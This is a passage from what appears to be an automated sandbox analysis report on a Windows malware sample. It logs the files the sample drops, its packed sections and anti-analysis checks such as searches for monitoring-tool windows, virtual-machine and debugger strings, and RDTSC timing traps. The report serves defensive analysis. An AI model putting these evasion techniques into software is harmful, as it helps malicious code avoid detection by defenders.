                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: winrnr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: TNyOrM6mIM.exeStatic file information: File size 7080960 > 1048576
                Source: TNyOrM6mIM.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x518a00
                Source: TNyOrM6mIM.exeStatic PE information: Raw size of fsurptkt is bigger than: 0x100000 < 0x1a3200

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeUnpacked PE file: 0.2.TNyOrM6mIM.exe.850000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fsurptkt:EW;mtouvxvi:EW;.taggant:EW; vs :ER;.rsrc:W;
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 2_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,2_2_00406328
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: PasoCattle.exe.0.drStatic PE information: real checksum: 0x102e74 should be: 0x10b21d
                Source: TNyOrM6mIM.exeStatic PE information: real checksum: 0x6cbad8 should be: 0x6c3101
                Source: TNyOrM6mIM.exeStatic PE information: section name:
                Source: TNyOrM6mIM.exeStatic PE information: section name: .idata
                Source: TNyOrM6mIM.exeStatic PE information: section name:
                Source: TNyOrM6mIM.exeStatic PE information: section name: fsurptkt
                Source: TNyOrM6mIM.exeStatic PE information: section name: mtouvxvi
                Source: TNyOrM6mIM.exeStatic PE information: section name: .taggant
                Source: Set-up.exe.0.drStatic PE information: section name: .eh_fram
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_0172521F pushad ; ret 3_3_01725220
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_0172521F pushad ; ret 3_3_01725220
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_0172521F pushad ; ret 3_3_01725220
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_0172521F pushad ; ret 3_3_01725220
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_0172521F pushad ; ret 3_3_01725220
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_0171CC01 pushfd ; retf 3_3_0171CC11
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_0171CC01 pushfd ; retf 3_3_0171CC11
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_0171CC01 pushfd ; retf 3_3_0171CC11
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_0171CC01 pushfd ; retf 3_3_0171CC11
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_0171CC01 pushfd ; retf 3_3_0171CC11
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_0172521F pushad ; ret 3_3_01725220
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_0172521F pushad ; ret 3_3_01725220
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_0172521F pushad ; ret 3_3_01725220
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_0172521F pushad ; ret 3_3_01725220
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_0172521F pushad ; ret 3_3_01725220
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_0171CC01 pushfd ; retf 3_3_0171CC11
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_0171CC01 pushfd ; retf 3_3_0171CC11
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_0171CC01 pushfd ; retf 3_3_0171CC11
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_0171CC01 pushfd ; retf 3_3_0171CC11
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_0171CC01 pushfd ; retf 3_3_0171CC11
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_0172521F pushad ; ret 3_3_01725220
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_0172521F pushad ; ret 3_3_01725220
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_0172521F pushad ; ret 3_3_01725220
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_0172521F pushad ; ret 3_3_01725220
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_0172521F pushad ; ret 3_3_01725220
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_0171CC01 pushfd ; retf 3_3_0171CC11
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_0171CC01 pushfd ; retf 3_3_0171CC11
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_0171CC01 pushfd ; retf 3_3_0171CC11
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_0171CC01 pushfd ; retf 3_3_0171CC11
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_0171CC01 pushfd ; retf 3_3_0171CC11
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_0172521F pushad ; ret 3_3_01725220
                Source: TNyOrM6mIM.exeStatic PE information: section name: fsurptkt entropy: 7.953041341484228

                Persistence and Installation Behavior

                barindex
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\768400\Climb.comJump to dropped file
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\768400\Climb.comJump to dropped file
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeFile created: C:\Users\user\AppData\Local\Temp\PasoCattle.exeJump to dropped file
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeFile created: C:\Users\user\AppData\Local\Temp\Set-up.exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00AF26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,14_2_00AF26DD
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00A7FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,14_2_00A7FC7C
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_14-104870
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: TNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007944000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.2355150183.0000000000ADB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drBinary or memory string: PROCMON.EXE
                Source: TNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007944000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.2355150183.0000000000ADB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drBinary or memory string: X64DBG.EXE
                Source: TNyOrM6mIM.exe, TNyOrM6mIM.exe, 00000000.00000002.2380121597.0000000000852000.00000040.00000001.01000000.00000003.sdmp, TNyOrM6mIM.exe, 00000000.00000003.2338156442.00000000057B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: TNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007944000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.2355150183.0000000000ADB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drBinary or memory string: WINDBG.EXE
                Source: Set-up.exe.0.drBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
                Source: TNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007944000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.2355150183.0000000000ADB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drBinary or memory string: WIRESHARK.EXE
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: FE9A04 second address: FE9A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 115BC82 second address: 115BC87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 115B185 second address: 115B18D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 115B18D second address: 115B1A0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD6F84FEE6Eh 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 115B58C second address: 115B593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 115D5FD second address: 115D602 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 115D73B second address: 115D73F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 115D7EC second address: 115D857 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FD6F84FEE66h 0x00000009 jl 00007FD6F84FEE66h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 add dword ptr [esp], 655210C7h 0x00000019 mov dword ptr [ebp+122D34A1h], eax 0x0000001f push 00000003h 0x00000021 jnc 00007FD6F84FEE6Ch 0x00000027 mov esi, dword ptr [ebp+122D37E0h] 0x0000002d add dword ptr [ebp+122D1AB1h], edx 0x00000033 push 00000000h 0x00000035 or dword ptr [ebp+122D34BDh], ecx 0x0000003b mov edi, dword ptr [ebp+122D37E8h] 0x00000041 push 00000003h 0x00000043 jmp 00007FD6F84FEE79h 0x00000048 push 508D8EDCh 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 jbe 00007FD6F84FEE66h 0x00000056 pop eax 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 115D857 second address: 115D862 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FD6F84FD816h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 115D986 second address: 115D991 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 115D991 second address: 115DA38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 add dword ptr [esp], 254A0BB4h 0x0000000d mov dl, ch 0x0000000f jmp 00007FD6F84FD81Bh 0x00000014 push 00000003h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007FD6F84FD818h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 mov ecx, dword ptr [ebp+122D3750h] 0x00000036 push 00000000h 0x00000038 jmp 00007FD6F84FD81Eh 0x0000003d push 00000003h 0x0000003f xor dword ptr [ebp+122D33D8h], ecx 0x00000045 sub edx, 01AE31D9h 0x0000004b push FF08BCA4h 0x00000050 jmp 00007FD6F84FD824h 0x00000055 xor dword ptr [esp], 3F08BCA4h 0x0000005c mov edx, dword ptr [ebp+122D36A8h] 0x00000062 lea ebx, dword ptr [ebp+124474EAh] 0x00000068 movsx edi, dx 0x0000006b push eax 0x0000006c push eax 0x0000006d push edx 0x0000006e pushad 0x0000006f jmp 00007FD6F84FD81Fh 0x00000074 push ebx 0x00000075 pop ebx 0x00000076 popad 0x00000077 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 117E3A3 second address: 117E3C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD6F84FEE76h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 117C674 second address: 117C678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 117C678 second address: 117C681 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 117C681 second address: 117C687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 117C687 second address: 117C68C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 117C68C second address: 117C697 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FD6F84FD816h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 117C697 second address: 117C69D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 117C69D second address: 117C6A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 117C6A8 second address: 117C6B2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD6F84FEE66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 117CAC2 second address: 117CAC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 117CAC7 second address: 117CAD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD6F84FEE6Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 117CDF2 second address: 117CDF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 117CDF6 second address: 117CDFC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 117CDFC second address: 117CE01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 117CE01 second address: 117CE09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 117CFBD second address: 117CFC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 117CFC3 second address: 117CFC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 117CFC9 second address: 117CFED instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD6F84FD816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jne 00007FD6F84FD81Eh 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 117CFED second address: 117CFF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 117D155 second address: 117D15D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\TNyOrM6mIM.exeRDTSC instruction interceptor: First address: 117D414 second address: 117D418 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
